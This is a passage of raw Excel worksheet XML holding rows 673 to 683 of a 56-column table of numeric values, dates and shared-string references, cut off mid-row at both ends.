      </c>
      <c r="O673">
        <v>0</v>
      </c>
      <c r="P673">
        <v>0</v>
      </c>
      <c r="Q673">
        <v>5</v>
      </c>
      <c r="R673">
        <v>20</v>
      </c>
      <c r="S673">
        <v>0</v>
      </c>
      <c r="T673">
        <v>0</v>
      </c>
      <c r="U673">
        <v>1000000</v>
      </c>
      <c r="V673">
        <v>0</v>
      </c>
      <c r="W673">
        <v>5000</v>
      </c>
      <c r="X673">
        <v>2000</v>
      </c>
      <c r="Y673">
        <v>0</v>
      </c>
      <c r="Z673">
        <v>0</v>
      </c>
      <c r="AA673">
        <v>0</v>
      </c>
      <c r="AB673">
        <v>200</v>
      </c>
      <c r="AC673">
        <v>100</v>
      </c>
      <c r="AD673">
        <v>0</v>
      </c>
      <c r="AE673">
        <v>0</v>
      </c>
      <c r="AF673" t="s">
        <v>5311</v>
      </c>
      <c r="AG673">
        <v>14450</v>
      </c>
      <c r="AH673">
        <v>12</v>
      </c>
      <c r="AJ673">
        <v>160</v>
      </c>
      <c r="AK673" t="s">
        <v>114</v>
      </c>
      <c r="AL673" t="s">
        <v>115</v>
      </c>
      <c r="AM673" t="s">
        <v>5312</v>
      </c>
      <c r="AN673" t="s">
        <v>82</v>
      </c>
      <c r="AO673">
        <v>2019</v>
      </c>
      <c r="AP673" t="s">
        <v>5268</v>
      </c>
      <c r="AQ673" t="s">
        <v>5313</v>
      </c>
      <c r="AR673" t="s">
        <v>5314</v>
      </c>
      <c r="AS673" t="s">
        <v>187</v>
      </c>
      <c r="AT673" t="s">
        <v>58</v>
      </c>
      <c r="AU673">
        <v>25</v>
      </c>
      <c r="AV673">
        <v>0</v>
      </c>
      <c r="AW673">
        <v>23</v>
      </c>
      <c r="AX673">
        <v>3</v>
      </c>
      <c r="AY673">
        <v>10</v>
      </c>
      <c r="AZ673">
        <v>15</v>
      </c>
      <c r="BA673" t="s">
        <v>17192</v>
      </c>
      <c r="BB673">
        <v>0</v>
      </c>
      <c r="BC673" t="s">
        <v>10174</v>
      </c>
      <c r="BD673" t="s">
        <v>10173</v>
      </c>
    </row>
    <row r="674" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A674">
        <v>2323</v>
      </c>
      <c r="B674" t="s">
        <v>5315</v>
      </c>
      <c r="C674" t="s">
        <v>458</v>
      </c>
      <c r="D674" t="s">
        <v>5316</v>
      </c>
      <c r="E674" t="s">
        <v>111</v>
      </c>
      <c r="F674" t="s">
        <v>5317</v>
      </c>
      <c r="G674" s="1">
        <v>43879</v>
      </c>
      <c r="H674">
        <v>1450</v>
      </c>
      <c r="I674">
        <v>1450</v>
      </c>
      <c r="J674">
        <v>1</v>
      </c>
      <c r="K674">
        <v>0</v>
      </c>
      <c r="L674">
        <v>0</v>
      </c>
      <c r="M674">
        <v>0</v>
      </c>
      <c r="N674">
        <v>0</v>
      </c>
      <c r="O674">
        <v>0</v>
      </c>
      <c r="P674">
        <v>0</v>
      </c>
      <c r="Q674">
        <v>0</v>
      </c>
      <c r="R674">
        <v>0</v>
      </c>
      <c r="S674">
        <v>0</v>
      </c>
      <c r="T674">
        <v>0</v>
      </c>
      <c r="U674">
        <v>70000</v>
      </c>
      <c r="V674">
        <v>0</v>
      </c>
      <c r="W674">
        <v>0</v>
      </c>
      <c r="X674">
        <v>0</v>
      </c>
      <c r="Y674">
        <v>0</v>
      </c>
      <c r="Z674">
        <v>0</v>
      </c>
      <c r="AA674">
        <v>0</v>
      </c>
      <c r="AB674">
        <v>0</v>
      </c>
      <c r="AC674">
        <v>0</v>
      </c>
      <c r="AD674">
        <v>0</v>
      </c>
      <c r="AE674">
        <v>0</v>
      </c>
      <c r="AF674" t="s">
        <v>5318</v>
      </c>
      <c r="AG674">
        <v>0</v>
      </c>
      <c r="AH674">
        <v>5</v>
      </c>
      <c r="AJ674">
        <v>153</v>
      </c>
      <c r="AK674" t="s">
        <v>2427</v>
      </c>
      <c r="AL674" t="s">
        <v>5319</v>
      </c>
      <c r="AM674" t="s">
        <v>5320</v>
      </c>
      <c r="AN674" t="s">
        <v>55</v>
      </c>
      <c r="AO674">
        <v>2019</v>
      </c>
      <c r="AP674">
        <v>81270649988</v>
      </c>
      <c r="AQ674" t="s">
        <v>5321</v>
      </c>
      <c r="AR674" t="s">
        <v>5318</v>
      </c>
      <c r="AS674" t="s">
        <v>71</v>
      </c>
      <c r="AT674" t="s">
        <v>58</v>
      </c>
      <c r="AU674">
        <v>26</v>
      </c>
      <c r="AV674">
        <v>1</v>
      </c>
      <c r="AW674">
        <v>1</v>
      </c>
      <c r="AX674">
        <v>0</v>
      </c>
      <c r="AY674">
        <v>7</v>
      </c>
      <c r="AZ674">
        <v>2</v>
      </c>
      <c r="BA674" t="s">
        <v>17183</v>
      </c>
      <c r="BB674" t="s">
        <v>15856</v>
      </c>
      <c r="BC674" t="s">
        <v>10222</v>
      </c>
      <c r="BD674" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="675" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A675">
        <v>2594</v>
      </c>
      <c r="B675" t="s">
        <v>5322</v>
      </c>
      <c r="C675" t="s">
        <v>458</v>
      </c>
      <c r="D675" t="s">
        <v>5323</v>
      </c>
      <c r="E675" t="s">
        <v>142</v>
      </c>
      <c r="F675" t="s">
        <v>1564</v>
      </c>
      <c r="G675" s="1">
        <v>43879</v>
      </c>
      <c r="H675">
        <v>1457</v>
      </c>
      <c r="I675">
        <v>1457</v>
      </c>
      <c r="J675">
        <v>1</v>
      </c>
      <c r="K675">
        <v>0</v>
      </c>
      <c r="L675">
        <v>0</v>
      </c>
      <c r="M675">
        <v>0</v>
      </c>
      <c r="N675">
        <v>0</v>
      </c>
      <c r="O675">
        <v>0</v>
      </c>
      <c r="P675">
        <v>0</v>
      </c>
      <c r="Q675">
        <v>0</v>
      </c>
      <c r="R675">
        <v>0</v>
      </c>
      <c r="S675">
        <v>1</v>
      </c>
      <c r="T675">
        <v>0</v>
      </c>
      <c r="U675">
        <v>400000</v>
      </c>
      <c r="V675">
        <v>0</v>
      </c>
      <c r="W675">
        <v>0</v>
      </c>
      <c r="X675">
        <v>0</v>
      </c>
      <c r="Y675">
        <v>0</v>
      </c>
      <c r="Z675">
        <v>0</v>
      </c>
      <c r="AA675">
        <v>0</v>
      </c>
      <c r="AB675">
        <v>0</v>
      </c>
      <c r="AC675">
        <v>0</v>
      </c>
      <c r="AD675">
        <v>1</v>
      </c>
      <c r="AE675">
        <v>0</v>
      </c>
      <c r="AF675" t="s">
        <v>5324</v>
      </c>
      <c r="AG675">
        <v>29467</v>
      </c>
      <c r="AH675">
        <v>5</v>
      </c>
      <c r="AJ675">
        <v>153</v>
      </c>
      <c r="AK675" t="s">
        <v>5325</v>
      </c>
      <c r="AL675" t="s">
        <v>5326</v>
      </c>
      <c r="AM675" t="s">
        <v>5327</v>
      </c>
      <c r="AN675" t="s">
        <v>68</v>
      </c>
      <c r="AO675">
        <v>1995</v>
      </c>
      <c r="AP675">
        <v>82383877883</v>
      </c>
      <c r="AQ675" t="s">
        <v>5328</v>
      </c>
      <c r="AR675" t="s">
        <v>5324</v>
      </c>
      <c r="AS675" t="s">
        <v>179</v>
      </c>
      <c r="AT675" t="s">
        <v>58</v>
      </c>
      <c r="AU675">
        <v>24</v>
      </c>
      <c r="AV675">
        <v>0</v>
      </c>
      <c r="AW675">
        <v>0</v>
      </c>
      <c r="AX675">
        <v>5</v>
      </c>
      <c r="AY675">
        <v>2</v>
      </c>
      <c r="AZ675">
        <v>4</v>
      </c>
      <c r="BA675" t="s">
        <v>17199</v>
      </c>
      <c r="BB675" t="s">
        <v>15878</v>
      </c>
      <c r="BC675" t="s">
        <v>10235</v>
      </c>
      <c r="BD675">
        <v>0</v>
      </c>
    </row>
    <row r="676" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A676">
        <v>1858</v>
      </c>
      <c r="B676" t="s">
        <v>5329</v>
      </c>
      <c r="C676" t="s">
        <v>477</v>
      </c>
      <c r="D676" t="s">
        <v>5330</v>
      </c>
      <c r="E676" t="s">
        <v>5331</v>
      </c>
      <c r="F676" t="s">
        <v>5332</v>
      </c>
      <c r="G676" s="1">
        <v>44350</v>
      </c>
      <c r="H676">
        <v>1469</v>
      </c>
      <c r="I676">
        <v>1469</v>
      </c>
      <c r="J676">
        <v>0</v>
      </c>
      <c r="K676">
        <v>0</v>
      </c>
      <c r="L676">
        <v>0</v>
      </c>
      <c r="M676">
        <v>0</v>
      </c>
      <c r="N676">
        <v>0</v>
      </c>
      <c r="O676">
        <v>0</v>
      </c>
      <c r="P676">
        <v>0</v>
      </c>
      <c r="Q676">
        <v>0</v>
      </c>
      <c r="R676">
        <v>10</v>
      </c>
      <c r="S676">
        <v>0</v>
      </c>
      <c r="T676">
        <v>1</v>
      </c>
      <c r="U676">
        <v>0</v>
      </c>
      <c r="V676">
        <v>0</v>
      </c>
      <c r="W676">
        <v>0</v>
      </c>
      <c r="X676">
        <v>0</v>
      </c>
      <c r="Y676">
        <v>0</v>
      </c>
      <c r="Z676">
        <v>0</v>
      </c>
      <c r="AA676">
        <v>0</v>
      </c>
      <c r="AB676">
        <v>0</v>
      </c>
      <c r="AC676">
        <v>10000</v>
      </c>
      <c r="AD676">
        <v>0</v>
      </c>
      <c r="AE676">
        <v>5000</v>
      </c>
      <c r="AF676" t="s">
        <v>5333</v>
      </c>
      <c r="AG676">
        <v>95372</v>
      </c>
      <c r="AH676">
        <v>29</v>
      </c>
      <c r="AJ676">
        <v>376</v>
      </c>
      <c r="AK676" t="s">
        <v>5334</v>
      </c>
      <c r="AL676" t="s">
        <v>5335</v>
      </c>
      <c r="AM676" t="s">
        <v>5336</v>
      </c>
      <c r="AN676" t="s">
        <v>55</v>
      </c>
      <c r="AO676">
        <v>2011</v>
      </c>
      <c r="AP676" t="s">
        <v>5337</v>
      </c>
      <c r="AQ676" t="s">
        <v>5338</v>
      </c>
      <c r="AR676" t="s">
        <v>5333</v>
      </c>
      <c r="AS676" t="s">
        <v>71</v>
      </c>
      <c r="AT676" t="s">
        <v>58</v>
      </c>
      <c r="AU676">
        <v>25</v>
      </c>
      <c r="AV676">
        <v>1</v>
      </c>
      <c r="AW676">
        <v>5</v>
      </c>
      <c r="AX676">
        <v>5</v>
      </c>
      <c r="AY676">
        <v>6</v>
      </c>
      <c r="AZ676">
        <v>3</v>
      </c>
      <c r="BA676" t="s">
        <v>17015</v>
      </c>
      <c r="BB676" t="s">
        <v>15556</v>
      </c>
      <c r="BC676">
        <v>0</v>
      </c>
      <c r="BD676" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="677" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A677">
        <v>2546</v>
      </c>
      <c r="B677" t="s">
        <v>5339</v>
      </c>
      <c r="C677" t="s">
        <v>458</v>
      </c>
      <c r="D677" t="s">
        <v>5340</v>
      </c>
      <c r="E677" t="s">
        <v>111</v>
      </c>
      <c r="F677" t="s">
        <v>5341</v>
      </c>
      <c r="G677" s="1">
        <v>43896</v>
      </c>
      <c r="H677">
        <v>1475</v>
      </c>
      <c r="I677">
        <v>1475</v>
      </c>
      <c r="J677">
        <v>2</v>
      </c>
      <c r="K677">
        <v>0</v>
      </c>
      <c r="L677">
        <v>1</v>
      </c>
      <c r="M677">
        <v>0</v>
      </c>
      <c r="N677">
        <v>0</v>
      </c>
      <c r="O677">
        <v>0</v>
      </c>
      <c r="P677">
        <v>0</v>
      </c>
      <c r="Q677">
        <v>0</v>
      </c>
      <c r="R677">
        <v>0</v>
      </c>
      <c r="S677">
        <v>0</v>
      </c>
      <c r="T677">
        <v>0</v>
      </c>
      <c r="U677">
        <v>350000</v>
      </c>
      <c r="V677">
        <v>0</v>
      </c>
      <c r="W677">
        <v>1500</v>
      </c>
      <c r="X677">
        <v>0</v>
      </c>
      <c r="Y677">
        <v>0</v>
      </c>
      <c r="Z677">
        <v>0</v>
      </c>
      <c r="AA677">
        <v>0</v>
      </c>
      <c r="AB677">
        <v>0</v>
      </c>
      <c r="AC677">
        <v>0</v>
      </c>
      <c r="AD677">
        <v>0</v>
      </c>
      <c r="AE677">
        <v>0</v>
      </c>
      <c r="AF677" t="s">
        <v>3507</v>
      </c>
      <c r="AG677">
        <v>29661</v>
      </c>
      <c r="AH677">
        <v>5</v>
      </c>
      <c r="AJ677">
        <v>148</v>
      </c>
      <c r="AK677" t="s">
        <v>4474</v>
      </c>
      <c r="AL677" t="s">
        <v>5342</v>
      </c>
      <c r="AM677" t="s">
        <v>5343</v>
      </c>
      <c r="AN677" t="s">
        <v>68</v>
      </c>
      <c r="AO677">
        <v>2019</v>
      </c>
      <c r="AP677">
        <v>82384456136</v>
      </c>
      <c r="AQ677" t="s">
        <v>5344</v>
      </c>
      <c r="AR677" t="s">
        <v>3507</v>
      </c>
      <c r="AS677" t="s">
        <v>71</v>
      </c>
      <c r="AT677" t="s">
        <v>58</v>
      </c>
      <c r="AU677">
        <v>26</v>
      </c>
      <c r="AV677">
        <v>0</v>
      </c>
      <c r="AW677">
        <v>10</v>
      </c>
      <c r="AX677">
        <v>0</v>
      </c>
      <c r="AY677">
        <v>1</v>
      </c>
      <c r="AZ677">
        <v>2</v>
      </c>
      <c r="BA677" t="s">
        <v>17170</v>
      </c>
      <c r="BB677">
        <v>0</v>
      </c>
      <c r="BC677" t="s">
        <v>10231</v>
      </c>
      <c r="BD677" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="678" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A678">
        <v>2598</v>
      </c>
      <c r="B678" t="s">
        <v>5345</v>
      </c>
      <c r="C678" t="s">
        <v>579</v>
      </c>
      <c r="D678" t="s">
        <v>5346</v>
      </c>
      <c r="E678" t="s">
        <v>1312</v>
      </c>
      <c r="F678" t="s">
        <v>5347</v>
      </c>
      <c r="G678" s="1">
        <v>43888</v>
      </c>
      <c r="H678">
        <v>1489</v>
      </c>
      <c r="I678">
        <v>1489</v>
      </c>
      <c r="J678">
        <v>0</v>
      </c>
      <c r="K678">
        <v>0</v>
      </c>
      <c r="L678">
        <v>0</v>
      </c>
      <c r="M678">
        <v>10</v>
      </c>
      <c r="N678">
        <v>0</v>
      </c>
      <c r="O678">
        <v>0</v>
      </c>
      <c r="P678">
        <v>0</v>
      </c>
      <c r="Q678">
        <v>0</v>
      </c>
      <c r="R678">
        <v>0</v>
      </c>
      <c r="S678">
        <v>1</v>
      </c>
      <c r="T678">
        <v>0</v>
      </c>
      <c r="U678">
        <v>0</v>
      </c>
      <c r="V678">
        <v>0</v>
      </c>
      <c r="W678">
        <v>0</v>
      </c>
      <c r="X678">
        <v>3100</v>
      </c>
      <c r="Y678">
        <v>0</v>
      </c>
      <c r="Z678">
        <v>0</v>
      </c>
      <c r="AA678">
        <v>0</v>
      </c>
      <c r="AB678">
        <v>0</v>
      </c>
      <c r="AC678">
        <v>0</v>
      </c>
      <c r="AD678">
        <v>1</v>
      </c>
      <c r="AE678">
        <v>0</v>
      </c>
      <c r="AF678" t="s">
        <v>5348</v>
      </c>
      <c r="AG678">
        <v>75131</v>
      </c>
      <c r="AH678">
        <v>23</v>
      </c>
      <c r="AJ678">
        <v>364</v>
      </c>
      <c r="AK678" t="s">
        <v>5349</v>
      </c>
      <c r="AL678" t="s">
        <v>5350</v>
      </c>
      <c r="AM678" t="s">
        <v>5351</v>
      </c>
      <c r="AN678" t="s">
        <v>68</v>
      </c>
      <c r="AO678">
        <v>2007</v>
      </c>
      <c r="AP678">
        <v>85250496410</v>
      </c>
      <c r="AQ678" t="s">
        <v>5352</v>
      </c>
      <c r="AR678" t="s">
        <v>5353</v>
      </c>
      <c r="AS678" t="s">
        <v>371</v>
      </c>
      <c r="AT678" t="s">
        <v>72</v>
      </c>
      <c r="AU678">
        <v>26</v>
      </c>
      <c r="AV678">
        <v>1</v>
      </c>
      <c r="AW678">
        <v>1</v>
      </c>
      <c r="AX678">
        <v>3</v>
      </c>
      <c r="AY678">
        <v>0</v>
      </c>
      <c r="AZ678">
        <v>0</v>
      </c>
      <c r="BA678" t="s">
        <v>17200</v>
      </c>
      <c r="BB678" t="s">
        <v>17215</v>
      </c>
      <c r="BC678" t="s">
        <v>10241</v>
      </c>
      <c r="BD678">
        <v>0</v>
      </c>
    </row>
    <row r="679" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A679">
        <v>2183</v>
      </c>
      <c r="B679" t="s">
        <v>5354</v>
      </c>
      <c r="C679" t="s">
        <v>99</v>
      </c>
      <c r="D679" t="s">
        <v>5355</v>
      </c>
      <c r="E679" t="s">
        <v>300</v>
      </c>
      <c r="F679" t="s">
        <v>4742</v>
      </c>
      <c r="G679" s="1">
        <v>43998</v>
      </c>
      <c r="H679">
        <v>1507</v>
      </c>
      <c r="I679">
        <v>1507</v>
      </c>
      <c r="J679">
        <v>1</v>
      </c>
      <c r="K679">
        <v>0</v>
      </c>
      <c r="L679">
        <v>0</v>
      </c>
      <c r="M679">
        <v>0</v>
      </c>
      <c r="N679">
        <v>0</v>
      </c>
      <c r="O679">
        <v>0</v>
      </c>
      <c r="P679">
        <v>0</v>
      </c>
      <c r="Q679">
        <v>0</v>
      </c>
      <c r="R679">
        <v>0</v>
      </c>
      <c r="S679">
        <v>0</v>
      </c>
      <c r="T679">
        <v>0</v>
      </c>
      <c r="U679">
        <v>500000</v>
      </c>
      <c r="V679">
        <v>0</v>
      </c>
      <c r="W679">
        <v>0</v>
      </c>
      <c r="X679">
        <v>0</v>
      </c>
      <c r="Y679">
        <v>0</v>
      </c>
      <c r="Z679">
        <v>0</v>
      </c>
      <c r="AA679">
        <v>0</v>
      </c>
      <c r="AB679">
        <v>0</v>
      </c>
      <c r="AC679">
        <v>0</v>
      </c>
      <c r="AD679">
        <v>0</v>
      </c>
      <c r="AE679">
        <v>0</v>
      </c>
      <c r="AF679" t="s">
        <v>5356</v>
      </c>
      <c r="AG679">
        <v>14440</v>
      </c>
      <c r="AH679">
        <v>12</v>
      </c>
      <c r="AJ679">
        <v>160</v>
      </c>
      <c r="AK679" t="s">
        <v>114</v>
      </c>
      <c r="AL679" t="s">
        <v>115</v>
      </c>
      <c r="AM679" t="s">
        <v>5357</v>
      </c>
      <c r="AN679" t="s">
        <v>55</v>
      </c>
      <c r="AO679">
        <v>2018</v>
      </c>
      <c r="AP679">
        <v>81219992506</v>
      </c>
      <c r="AQ679" t="s">
        <v>5358</v>
      </c>
      <c r="AR679" t="s">
        <v>5356</v>
      </c>
      <c r="AS679" t="s">
        <v>187</v>
      </c>
      <c r="AT679" t="s">
        <v>58</v>
      </c>
      <c r="AU679">
        <v>24</v>
      </c>
      <c r="AV679">
        <v>0</v>
      </c>
      <c r="AW679">
        <v>0</v>
      </c>
      <c r="AX679">
        <v>0</v>
      </c>
      <c r="AY679">
        <v>5</v>
      </c>
      <c r="AZ679">
        <v>0</v>
      </c>
      <c r="BA679" t="s">
        <v>17081</v>
      </c>
      <c r="BB679" t="s">
        <v>15751</v>
      </c>
      <c r="BC679">
        <v>0</v>
      </c>
      <c r="BD679">
        <v>0</v>
      </c>
    </row>
    <row r="680" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A680">
        <v>2571</v>
      </c>
      <c r="B680" t="s">
        <v>5359</v>
      </c>
      <c r="C680" t="s">
        <v>99</v>
      </c>
      <c r="D680" t="s">
        <v>5360</v>
      </c>
      <c r="E680" t="s">
        <v>142</v>
      </c>
      <c r="F680" t="s">
        <v>285</v>
      </c>
      <c r="G680" s="1">
        <v>43871</v>
      </c>
      <c r="H680">
        <v>1519</v>
      </c>
      <c r="I680">
        <v>1519</v>
      </c>
      <c r="J680">
        <v>8</v>
      </c>
      <c r="K680">
        <v>0</v>
      </c>
      <c r="L680">
        <v>0</v>
      </c>
      <c r="M680">
        <v>0</v>
      </c>
      <c r="N680">
        <v>0</v>
      </c>
      <c r="O680">
        <v>0</v>
      </c>
      <c r="P680">
        <v>0</v>
      </c>
      <c r="Q680">
        <v>1</v>
      </c>
      <c r="R680">
        <v>0</v>
      </c>
      <c r="S680">
        <v>0</v>
      </c>
      <c r="T680">
        <v>1</v>
      </c>
      <c r="U680">
        <v>500000</v>
      </c>
      <c r="V680">
        <v>0</v>
      </c>
      <c r="W680">
        <v>0</v>
      </c>
      <c r="X680">
        <v>0</v>
      </c>
      <c r="Y680">
        <v>0</v>
      </c>
      <c r="Z680">
        <v>0</v>
      </c>
      <c r="AA680">
        <v>0</v>
      </c>
      <c r="AB680">
        <v>200</v>
      </c>
      <c r="AC680">
        <v>0</v>
      </c>
      <c r="AD680">
        <v>0</v>
      </c>
      <c r="AE680">
        <v>100</v>
      </c>
      <c r="AF680" t="s">
        <v>4480</v>
      </c>
      <c r="AG680">
        <v>11720</v>
      </c>
      <c r="AH680">
        <v>12</v>
      </c>
      <c r="AJ680">
        <v>159</v>
      </c>
      <c r="AK680" t="s">
        <v>114</v>
      </c>
      <c r="AL680" t="s">
        <v>114</v>
      </c>
      <c r="AM680" t="s">
        <v>5361</v>
      </c>
      <c r="AN680" t="s">
        <v>68</v>
      </c>
      <c r="AO680">
        <v>2019</v>
      </c>
      <c r="AP680">
        <v>216660739</v>
      </c>
      <c r="AQ680" t="s">
        <v>4480</v>
      </c>
      <c r="AR680" t="s">
        <v>4480</v>
      </c>
      <c r="AS680" t="s">
        <v>187</v>
      </c>
      <c r="AT680" t="s">
        <v>58</v>
      </c>
      <c r="AU680">
        <v>6</v>
      </c>
      <c r="AV680">
        <v>1</v>
      </c>
      <c r="AW680">
        <v>16</v>
      </c>
      <c r="AX680">
        <v>13</v>
      </c>
      <c r="AY680">
        <v>5</v>
      </c>
      <c r="AZ680">
        <v>5</v>
      </c>
      <c r="BA680" t="s">
        <v>17178</v>
      </c>
      <c r="BB680">
        <v>0</v>
      </c>
      <c r="BC680" t="s">
        <v>10287</v>
      </c>
      <c r="BD680" t="s">
        <v>10288</v>
      </c>
    </row>
    <row r="681" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A681">
        <v>2521</v>
      </c>
      <c r="B681" t="s">
        <v>5362</v>
      </c>
      <c r="C681" t="s">
        <v>129</v>
      </c>
      <c r="D681" t="s">
        <v>5363</v>
      </c>
      <c r="E681" t="s">
        <v>142</v>
      </c>
      <c r="F681" t="s">
        <v>5364</v>
      </c>
      <c r="G681" s="1">
        <v>43959</v>
      </c>
      <c r="H681">
        <v>1526</v>
      </c>
      <c r="I681">
        <v>1526</v>
      </c>
      <c r="J681">
        <v>3</v>
      </c>
      <c r="K681">
        <v>0</v>
      </c>
      <c r="L681">
        <v>0</v>
      </c>
      <c r="M681">
        <v>0</v>
      </c>
      <c r="N681">
        <v>0</v>
      </c>
      <c r="O681">
        <v>0</v>
      </c>
      <c r="P681">
        <v>0</v>
      </c>
      <c r="Q681">
        <v>0</v>
      </c>
      <c r="R681">
        <v>0</v>
      </c>
      <c r="S681">
        <v>0</v>
      </c>
      <c r="T681">
        <v>1</v>
      </c>
      <c r="U681">
        <v>875</v>
      </c>
      <c r="V681">
        <v>0</v>
      </c>
      <c r="W681">
        <v>0</v>
      </c>
      <c r="X681">
        <v>0</v>
      </c>
      <c r="Y681">
        <v>0</v>
      </c>
      <c r="Z681">
        <v>0</v>
      </c>
      <c r="AA681">
        <v>0</v>
      </c>
      <c r="AB681">
        <v>0</v>
      </c>
      <c r="AC681">
        <v>0</v>
      </c>
      <c r="AD681">
        <v>0</v>
      </c>
      <c r="AE681">
        <v>60</v>
      </c>
      <c r="AF681" t="s">
        <v>1893</v>
      </c>
      <c r="AG681">
        <v>15710</v>
      </c>
      <c r="AH681">
        <v>11</v>
      </c>
      <c r="AJ681">
        <v>268</v>
      </c>
      <c r="AK681" t="s">
        <v>277</v>
      </c>
      <c r="AL681" t="s">
        <v>278</v>
      </c>
      <c r="AM681" t="s">
        <v>5365</v>
      </c>
      <c r="AN681" t="s">
        <v>82</v>
      </c>
      <c r="AO681">
        <v>1973</v>
      </c>
      <c r="AP681" t="s">
        <v>5366</v>
      </c>
      <c r="AQ681" t="s">
        <v>5367</v>
      </c>
      <c r="AR681" t="s">
        <v>5368</v>
      </c>
      <c r="AS681" t="s">
        <v>71</v>
      </c>
      <c r="AT681" t="s">
        <v>86</v>
      </c>
      <c r="AU681">
        <v>26</v>
      </c>
      <c r="AV681">
        <v>1</v>
      </c>
      <c r="AW681">
        <v>28</v>
      </c>
      <c r="AX681">
        <v>20</v>
      </c>
      <c r="AY681">
        <v>0</v>
      </c>
      <c r="AZ681">
        <v>0</v>
      </c>
      <c r="BA681" t="s">
        <v>16646</v>
      </c>
      <c r="BB681">
        <v>0</v>
      </c>
      <c r="BC681" t="s">
        <v>10257</v>
      </c>
      <c r="BD681" t="s">
        <v>10974</v>
      </c>
    </row>
    <row r="682" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A682">
        <v>2016</v>
      </c>
      <c r="B682" t="s">
        <v>5283</v>
      </c>
      <c r="C682" t="s">
        <v>74</v>
      </c>
      <c r="D682" t="s">
        <v>5369</v>
      </c>
      <c r="E682" t="s">
        <v>5370</v>
      </c>
      <c r="F682" t="s">
        <v>5371</v>
      </c>
      <c r="G682" s="1">
        <v>43864</v>
      </c>
      <c r="H682">
        <v>1571</v>
      </c>
      <c r="I682">
        <v>1571</v>
      </c>
      <c r="J682">
        <v>2</v>
      </c>
      <c r="K682">
        <v>0</v>
      </c>
      <c r="L682">
        <v>16</v>
      </c>
      <c r="M682">
        <v>0</v>
      </c>
      <c r="N682">
        <v>0</v>
      </c>
      <c r="O682">
        <v>0</v>
      </c>
      <c r="P682">
        <v>0</v>
      </c>
      <c r="Q682">
        <v>5</v>
      </c>
      <c r="R682">
        <v>0</v>
      </c>
      <c r="S682">
        <v>0</v>
      </c>
      <c r="T682">
        <v>1</v>
      </c>
      <c r="U682">
        <v>800000</v>
      </c>
      <c r="V682">
        <v>0</v>
      </c>
      <c r="W682">
        <v>4000</v>
      </c>
      <c r="X682">
        <v>0</v>
      </c>
      <c r="Y682">
        <v>0</v>
      </c>
      <c r="Z682">
        <v>0</v>
      </c>
      <c r="AA682">
        <v>0</v>
      </c>
      <c r="AB682">
        <v>1000</v>
      </c>
      <c r="AC682">
        <v>0</v>
      </c>
      <c r="AD682">
        <v>0</v>
      </c>
      <c r="AE682">
        <v>4000</v>
      </c>
      <c r="AF682" t="s">
        <v>5372</v>
      </c>
      <c r="AG682">
        <v>59272</v>
      </c>
      <c r="AH682">
        <v>14</v>
      </c>
      <c r="AJ682">
        <v>204</v>
      </c>
      <c r="AK682" t="s">
        <v>2418</v>
      </c>
      <c r="AL682" t="s">
        <v>5373</v>
      </c>
      <c r="AM682" t="s">
        <v>5374</v>
      </c>
      <c r="AN682" t="s">
        <v>55</v>
      </c>
      <c r="AO682">
        <v>2018</v>
      </c>
      <c r="AP682">
        <v>81227063128</v>
      </c>
      <c r="AQ682" t="s">
        <v>5375</v>
      </c>
      <c r="AR682" t="s">
        <v>5372</v>
      </c>
      <c r="AU682">
        <v>26</v>
      </c>
      <c r="AV682">
        <v>1</v>
      </c>
      <c r="AW682">
        <v>11</v>
      </c>
      <c r="AX682">
        <v>62</v>
      </c>
      <c r="AY682">
        <v>7</v>
      </c>
      <c r="AZ682">
        <v>12</v>
      </c>
      <c r="BA682" t="s">
        <v>16785</v>
      </c>
      <c r="BB682" t="s">
        <v>14965</v>
      </c>
      <c r="BC682" t="s">
        <v>11160</v>
      </c>
      <c r="BD682" t="s">
        <v>11161</v>
      </c>
    </row>
    <row r="683" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A683">
        <v>2390</v>
      </c>
      <c r="B683" t="s">
        <v>5376</v>
      </c>
      <c r="C683" t="s">
        <v>99</v>
      </c>
      <c r="D683" t="s">
        <v>5377</v>
      </c>
      <c r="E683" t="s">
        <v>5370</v>
      </c>
      <c r="F683" t="s">
        <v>5378</v>
      </c>
      <c r="G683" s="1">
        <v>44340</v>
      </c>
      <c r="H683">
        <v>1579</v>
      </c>
      <c r="I683">
        <v>1579</v>
      </c>
      <c r="J683">
        <v>2</v>
      </c>
      <c r="K683">
        <v>0</v>
      </c>
      <c r="L683">
        <v>1</v>
      </c>
      <c r="M683">
        <v>0</v>
      </c>
      <c r="N683">
        <v>0</v>
      </c>
      <c r="O683">
        <v>0</v>
      </c>
      <c r="P683">
        <v>0</v>
      </c>
      <c r="Q683">
        <v>0</v>
      </c>
      <c r="R683">
        <v>0</v>
      </c>
      <c r="S683">
        <v>0</v>
      </c>
      <c r="T683">
        <v>1</v>
      </c>
      <c r="U683">
        <v>600000</v>
      </c>
      <c r="V683">
        <v>0</v>
      </c>
      <c r="W683">
        <v>4000</v>
      </c>
      <c r="X683">
        <v>0</v>
      </c>
      <c r="Y683">
        <v>0</v>
      </c>
      <c r="Z683">
        <v>0</v>
      </c>
      <c r="AA683">
        <v>0</v>
      </c>
      <c r="AB683">
        <v>0</v>
      </c>
      <c r="AC683">
        <v>0</v>
      </c>
      <c r="AD683">
        <v>0</v>
      </c>
      <c r="AE683">
        <v>8000</v>
      </c>
      <c r="AF683" t="s">
        <v>5379</v>
      </c>
      <c r="AG683">
        <v>14450</v>
      </c>
      <c r="AH683">
        <v>12</v>
      </c>
      <c r="AJ683">
        <v>160</v>
      </c>
      <c r="AK683" t="s">
        <v>114</v>
      </c>
      <c r="AL683" t="s">
        <v>115</v>
      </c>
      <c r="AM683" t="s">
        <v>5380</v>
      </c>
      <c r="AN683" t="s">
        <v>68</v>
      </c>
      <c r="AO683">
        <v>2019</v>
      </c>
      <c r="AP683">
        <v>81288808188</v>
      </c>
      <c r="AQ683" t="s">
        <v>5381</v>
      </c>
      <c r="AR683" t="s">
        <v>5379</v>
      </c>
      <c r="AS683" t="s">
